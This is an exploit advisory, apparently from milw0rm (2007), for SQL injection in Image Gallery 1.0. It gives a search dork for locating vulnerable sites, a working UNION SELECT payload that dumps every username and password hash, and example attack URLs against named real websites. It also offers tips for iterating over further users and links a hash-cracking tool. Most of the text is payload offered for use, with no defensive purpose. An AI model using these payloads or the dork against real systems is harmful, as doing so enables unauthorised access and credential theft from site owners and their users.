--==+================================================================================+==-- --==+ Image Gallery 1.0 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- AUTHOR: t0pP8uZz & xprog SCRIPT DOWNLOAD: N/A SITE: http://www.elkagroup.com/ DORK: intext:elkagroup Image Gallery v1.0 DESCRIPTION: With this vuln you can display every user:hash in the database EXPLOITS: EXPLOIT 1: http://www.server.com/SCRIPT_PATH/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users EXAMPLES: EXAMPLE 1: http://www.abfa-esfahan.com/gallery/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users EXAMPLE 2 (getting diffrent user): http://www.qanat.info/en/gallery/property.php?cid=0&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16%20from%20users%20%20where%20username%20not%20in%20(0x71616E6174696E) NOTE/TIP: hex the first username you get with EXAMPLE 1 then use EXAMPLE 2 and replace the hex with your new hex, To get diffrent users. Also sometimes te columns may vary so if its not working correct, add a few columns and remove a few, Enjoy. NOTE/TIP: The md5 has 13 characters removed from the end. Cracking Hashes: the hash this script uses is a modifed MD5 i have coded a tool for any type of md5 hash it works very well and is extremely fast while leaveing your cpu untouched, download it here: http://www.h4cky0u-filez.org/5819352 GREETZ: str0ke, H4CKY0u.org, G0t-Root.net ! --==+================================================================================+==-- --==+ Image Gallery 1.0 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- # milw0rm.com [2007-06-26]